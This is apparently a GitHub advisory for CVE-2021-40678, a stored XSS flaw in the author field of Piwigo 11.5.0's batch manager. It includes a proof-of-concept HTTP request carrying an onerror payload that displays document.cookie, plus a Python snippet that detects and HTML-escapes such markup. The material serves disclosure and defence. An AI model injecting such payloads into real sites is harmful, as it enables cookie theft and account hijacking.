CVE-2021-40678: Persistent Cross Site Scripting in Batch Manager(version:11.5.0) · Issue #1476 · Piwigo/Piwigo
In Piwigo 11.5.0, there exists a persistent cross-site scripting in the single mode function through /admin.php?page=batch_manager&mode=unit.
Description:
In the single (unit) mode of Piwigo's batch manager, modifying the author parameter of a picture causes persistent cross-site scripting.
Vulnerable Instances:
/admin.php?page=batch_manager&mode=unit
Affected source code file:
Request:
POST /admin.php?page=batch_manager&mode=unit HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/admin.php?page=batch_manager&mode=unit
Cookie: pwg_id=mof6jca30q9tr1qu48hhvqi143
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
element_ids=4&name-4=test&author-4=11111%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E11&date_creation-4=&level-4=0&description-4=&submit=Submit
Suggestion:
Validate user input and HTML-encode it on output.
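As an added illustration (not code from this report or from Piwigo), the Python below decodes the POST body quoted above, flags free-text fields whose decoded value carries markup, and shows the output-encoded form of the author value that the suggested fix should produce; the field names come from the request, while the markup regex and the list of free-text fields are assumptions.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed copy of the POST body quoted in the report above.
REPORTED_BODY = (
    "element_ids=4&name-4=test"
    "&author-4=11111%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E11"
    "&date_creation-4=&level-4=0&description-4=&submit=Submit"
)

# Assumed set of free-text form fields that are later rendered as HTML.
TEXT_FIELDS = ("name-", "author-", "description-")

# Tag-like content or an inline event handler inside a free-text value.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]|\bon[a-z]+\s*=", re.IGNORECASE)


def parse_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def flag_fields(fields: dict) -> list:
    """Return the names of free-text fields whose decoded value looks like HTML."""
    return sorted(
        name for name, value in fields.items()
        if name.startswith(TEXT_FIELDS) and MARKUP_RE.search(value)
    )


def render_safe(value: str) -> str:
    """Output-encode a stored value so the browser displays it as text, not markup."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    fields = parse_body(REPORTED_BODY)
    for name in flag_fields(fields):
        print(f"{name}: {fields[name]!r} -> {render_safe(fields[name])}")
```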